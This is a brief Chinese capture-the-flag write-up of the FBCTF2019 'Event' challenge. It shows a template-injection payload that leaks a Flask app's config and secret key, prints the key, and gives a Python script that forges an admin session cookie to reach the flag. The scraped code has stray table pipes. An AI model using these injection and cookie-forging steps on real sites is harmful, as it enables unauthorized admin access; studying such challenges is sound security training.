# [FBCTF2019]Event
# ![4]()
进入是这样的
直接注册 / 登录:
F12 发现有个 event_important 参数:用__dict___发现有回显,为 ssti
发现有可疑的 session user,可能在环境变量里面有密钥:
直接:
__class__.__init__.__globals__[app].config |
密钥:
fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y
有密钥后:
from flask import Flask | |
from flask.sessions import SecureCookieSessionInterface | |
app = Flask(__name__) | |
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y' | |
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app) | |
@app.route('/') | |
def index(): | |
print(session_serializer.dumps("admin")) | |
index() |
修改 user 的 cookie 值:
访问 /flag:出了